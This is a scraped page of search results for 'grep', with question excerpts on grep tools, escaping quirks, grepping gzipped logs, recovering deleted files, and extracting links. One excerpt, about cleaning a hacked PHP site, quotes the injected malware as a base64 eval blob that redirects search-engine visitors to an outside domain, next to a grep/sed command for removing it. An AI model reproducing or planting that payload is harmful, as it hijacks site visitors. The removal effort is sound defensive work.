Search Results

Search found 2253 results on 91 pages for 'grep'.

Page 2/91 | < Previous Page | 1 2 3 4 5 6 7 8 9 10 11 12  | Next Page >

  • Best grep-like tool

    - by e-satis
    I do in file search a lot, and used to love grep. Then I learn the existence of egrep, so I switched to benefit from the advanced regexp. Then I discovered the Eclipse search tool. Much easier to use that grep. Then I found ack : fast, easy, powerful. And now I use grin, which is smooth for pythonistas. I know there is also a couple of this kind of tools with a GUI. So what tool do you use, and why do you think it's the best. Practical features generally are : fast to fire and use; speedy processing; automatically ignore useless files; colored output; output lines, filename, context; allow complex regexp; allow a custom filtering and ouput; GUI + command line intergation; let you open an editor from the result set. There are some related posts on SO : http://stackoverflow.com/questions/87350/what-are-good-grep-tool-for-windows http://stackoverflow.com/questions/981601/colorized-grep-viewing-the-entire-file-with-highlighting http://stackoverflow.com/questions/1028107/is-there-some-unix-util-that-will-allow-me-to-grep-multiple-files-with-little-type http://stackoverflow.com/questions/1027906/unix-find-grep-syntax-vs-awk

    Read the article

  • grep on Windows XP vs. Windows 7

    - by cschol
    I am using grep from Gnuwin32 on Windows. On Windows XP, the following grep -e "foo" NUL results in the following output grep: NUL: invalid argument On Windows 7, the same arguments result in no output at all. Why is the output different between Windows XP and Windows 7?

    Read the article

  • Searching for literal "> \" using ack-grep

    - by Stephen Gornick
    I am looking for lines that literally have a greater than character (a "") followed by a space followed by a backslash character (a "\") i.e., a line with this: \ I thought escaping would allow this, and for the greater-than it does: $ ack-grep " " returns lines that have " " in them. But when I try to escape the backslash as well I get: $ ack-grep " \" ack-grep: Invalid regex ' \': Trailing \ in regex m/ \/

    Read the article

  • strange behaviour of grep in UNIX

    - by Happy Mittal
    When I type a command $ grep \h junk then shell should interpret \h as \h as two pairs of \ become \ each, and grep in turn, should interpret \h as \h as \ becomes \, so grep should search for a pattern \h in junk, which it is doing successfully. But it's not working for \$. Please explain why ?

    Read the article

  • strange behaviour of grep in UNIX

    - by Happy Mittal
    When I type a command $ grep \\h junk then shell should interpret \\h as \h as two pairs of \ become \ each, and grep in turn, should interpret \h as \h as \ becomes \, so grep should search for a pattern \h in junk, which it is doing successfully. But it's not working for \\$. Please explain why ?

    Read the article

  • Grepping grep output fails

    - by viraptor
    I'm trying to grep the output of ngrep. Unfortunately when I add another grep to the pipeline, I get no output at all. It can be some other command too - cat / grep / tee - everything breaks the chain. Example: # this works: $ ngrep -l -q -T -Wbyline -d any udp and port 5060 | egrep -B1 '^SIP/2.0 180' -- U +1.469535 xxx:5060 -> xxx:5060 SIP/2.0 180 Ringing. -- U +0.001384 xxx:5060 -> xxx:2048 SIP/2.0 180 Ringing. but #these don't: $ ngrep -l -q -T -Wbyline -d any udp and port 5060 | egrep -B1 '^SIP/2.0 180' | egrep '^U' $ ngrep -l -q -T -Wbyline -d any udp and port 5060 | egrep -B1 '^SIP/2.0 180' | cat $ ngrep -l -q -T -Wbyline -d any udp and port 5060 | egrep -B1 '^SIP/2.0 180' | tee test If I use cat somefile instead of ngrep at the start, everything works as expected. Any ideas what could go wrong here?

    Read the article

  • Recovering text files in terminal using grep on Mac OS X Snow Leopard

    - by littlejim84
    I foolishly removed some source code from my Mac OS X Snow Leopard machine with rm -rf when doing something with buildout. I want to try and recover these files again. I haven't touched the system since to try and seek an answer. I found this article and it seems like the grep method is the way to go, but when running it on my machine I'm getting 'Resource busy' when trying to run it on the disk. I'm using this command: sudo grep -a -B1000 -A1000 'video_output' /dev/disk0s2 > file.txt Where 'dev/disk0s2' is what came up when I ran df. I get this when running: grep: /dev/disk0s2: Resource busy I'm not an expert with this stuff, I'm trying my best. Please can anyone help me further? I'm on the verge of losing two days of source code work! Thank you

    Read the article

  • grep, xargs, sed to clean up PHP eval hack

    - by roktechie
    I'm attempting to use the commands found on http://devilsworkshop.org/tutorial/remove-evalbase64decode-malicious-code-grep-sed-commands-files-linux-server/55587/ to clean up a PHP eval based hack on a site. Sample code to match/remove <?php eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOwokcWF6cGxtPWhlYWRlcnNfc2VudCgpOwppZiAoISRxYXpwbG0pewokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107CiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOwppZiAoJHVhZykgewppZiAoIXN0cmlzdHIoJHVhZywiTVNJRSA3LjAiKSBhbmQgIXN0cmlzdHIoJHVhZywiTVNJRSA2LjAiKSl7CmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbS9sIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7CmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9sb29wZG93bi5sZmxpbmt1cC5jb20vIik7CmV4aXQoKTsKfQp9Cn0KfQp9")); Attempted command: sudo grep -lr --include=*.php "eval(base64_decode" /home/user/webdir | sudo xargs sed -i.bak 's/<?php eval(base64_decode[^;]*;/<?php\n/g' The sudo has been added as it is required to have permission to read/write on the dir I'm accessing. The files list properly from grep, but are not changed by sed. Any suggestions?

    Read the article

  • Grep all files in a directory and print matches with file name

    - by javanix
    I have a list of log files that I create as part of a video encoding script that I wrote. I would like to search all of them and print out certain statistics from the encode - how fast they were encoded, what settings were used, etc. I can search for the average framerate in one file via this 1 liner: cat ${filename} | grep average which outputs: work: average encoding speed for job is 23.211176 fps and search for the ratefactor: cat ${filename} | grep RF I would like to search all files in the directory and print off one, or prefereably both pieces of information along with the filename. Is there any way I can use find or grep to get this in a one-liner, or do I need to write a script? I would like output like this: /home/javanix/filename.log <RF line> <average line> I would like this to either work using FreeBSD 9 or Ubuntu 12.04.

    Read the article

  • grep with after-context that does not contain a keyword

    - by ukasz
    I want to grep through logs, and gather a certain exception stacktrace but I want to only see those that do not contain certain keywords in --after-context. I do not know in which line in after-context the keyword is. Simple example - given this shell code: grep -A 2 A <<EOF A B C R A Z Z X EOF the output is: A B C -- A Z Z I'd like the output to be: A Z Z I want to exclude any match that has 'B' in after-context How do I do this? Using grep is not a requirement, though I only have access to coreutils and perl.

    Read the article

  • linux grep question

    - by lepricon123
    how do i find a string in files in a directory. And these file names begin with letter a. I also want to get the number of occurrences of this string fromt he grep I run. I tried this cat * | grep -c string but it searches all files. I just want to search files that begin with letter a Thanks

    Read the article

  • grep - what arguments do you usually specify?

    - by meder
    My most common grep line is just.. grep -IRl "text" * However I'm kinda getting tired of retyping this over and over - is there some way I can make an alias command so that those arguments are always enabled? And, I was wondering what arguments you usually specify for text searching - my two arguments 'R' for recursion, 'I' for not including binary types like jpg/gif, and 'l' for line number seem a bit too minimal. Which arguments do you use?

    Read the article

  • Grep-ing gzipped files [duplicate]

    - by Julien Genestoux
    This question already has an answer here: Grepping through .gz log files 5 answers I have a set of 100 log files, compressed using gzip. I need to find all lines matching a given expression. I'd use grep, but of course, that's a bit of a nightmare because I'll have to unzip all files, one by one, grep them and delete the unzipped version, because they wouldn't all fit on my sevrer if they were all unzipped. Anyone has a little trick on how to get that done quickly?

    Read the article

  • grepping a substring from a grep result

    - by allentown
    Given a log file, I will usually do something like this: grep 'marker-1234' filter_log What is the difference in using '' or "" or nothing in the pattern? The above grep command will yield many thousands of lines; what I desire. Within those lines, There is usually one chunk of data I am after. Sometimes, I use awk to print out the fields I am after. In this case, the log format changes, I can't rely on position exclusively, not to mention, the actual logged data can push position forward. To make this understandable, lets say the log line contained an IP address, and that was all I was after, so I can later pipe it to sort and unique and get some tally counts. An example may be: 2010-04-08 some logged data, indetermineate chars - [marker-1234] (123.123.123.123) from: [email protected] to [email protected] [stat-xyz9876] The first grep command will give me many thousands of lines like the above, from there, I want to pipe it to something, probably sed, which can pull out a pattern within, and print only the pattern. For this example, using an the IP address would suffice. I tried. Is sed not able to understand [0-9]{1,3}. as a pattern? I had to [0-9][0-9][0-9]. which yielded strange results until the entire pattern created. This is not specific to an IP address, the pattern will change, but I can use that as a learning template. Thank you all.

    Read the article

  • Regex to find external links from the html file using grep

    - by Amar
    hello, From past few days I'm trying to develop a regex that fetch all the external links from the web pages given to it using grep. Here is my grep command grep -h -o -e "\(\(mailto:\|\(\(ht\|f\)tp\(s\?\)\)\)\://\)\{1\}\(.*\?\)" "/mnt/websites_folder/folder_to_search" -r now the grep seem to return everything after the external links in that given line Example if an html file contain something like this on same line GoogleYahoo then the given grep command return the following result http://www.google.com">Google</a><p><a href='https://yahoo.com'>Yahoo</a></p> the idea here is that if an html file contain more than one links(`irrespective in a,img etc`) in same line then the regex should fetch only the links and not all content of that line I managed to developed the same in rubular.com the regex is as follow ("|')(\b((ht|f)tps?:\/\/)(.*?)\b)("|') with work with the above input but iam not able to replicate the same in grep can anyone help I can't modify the html file so don't ask me to do that neither I can look for each specific tags and check their attributes to to get external links as it addup processing time and my application doesn't demand that Thank You

    Read the article

  • Match exactly (and only) the pattern I specify in a grep command

    - by palswim
    Usually, grep searches for all lines containing a match for the pattern/parameter I specify. I would like to match just the pattern (i.e. not the whole line). So, if a file contains the lines: We said that we'll come. Unfortunately, we were delayed. Now, we're on our way. I want to find all contractions starting with "we" (regex pattern: we\'[a-z]+/i). And I'm looking for the output: we'll we're How do I do this (with grep or another Unix/Windows command-line tool)?

    Read the article

  • How to grep in the git history?

    - by Ortwin Gentz
    I have deleted a file or some code in a file sometime in the past. Can I grep in the content (not in the commit messages)? A very poor solution is to grep the log: git log -p | grep However this doesn't return the commit hash straight away. I played around with "git grep" to no avail.

    Read the article

< Previous Page | 1 2 3 4 5 6 7 8 9 10 11 12  | Next Page >